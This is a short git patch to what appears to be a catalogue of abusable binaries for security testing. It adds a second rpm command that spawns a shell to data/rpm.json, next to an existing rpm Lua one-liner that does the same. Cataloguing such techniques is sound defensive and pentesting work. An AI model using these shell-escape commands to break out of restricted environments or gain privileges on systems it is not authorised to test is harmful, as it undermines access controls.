From 54a38a5323b949ddd2ac325cd7a8fb405f5eb5d3 Mon Sep 17 00:00:00 2001 From: "Mr. Robot" Date: Sun, 11 Apr 2021 08:54:48 +0200 Subject: [PATCH] add alternative shell --- data/rpm.json | 3 +++ 1 file changed, 3 insertions(+) diff --git a/data/rpm.json b/data/rpm.json index f6e5005..9cce3e4 100644 --- a/data/rpm.json +++ b/data/rpm.json @@ -3,6 +3,9 @@ "shell": [ { "code": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'" + }, + { + "code": "rpm --pipe '/bin/sh 0<&1'" } ], "limited-suid": [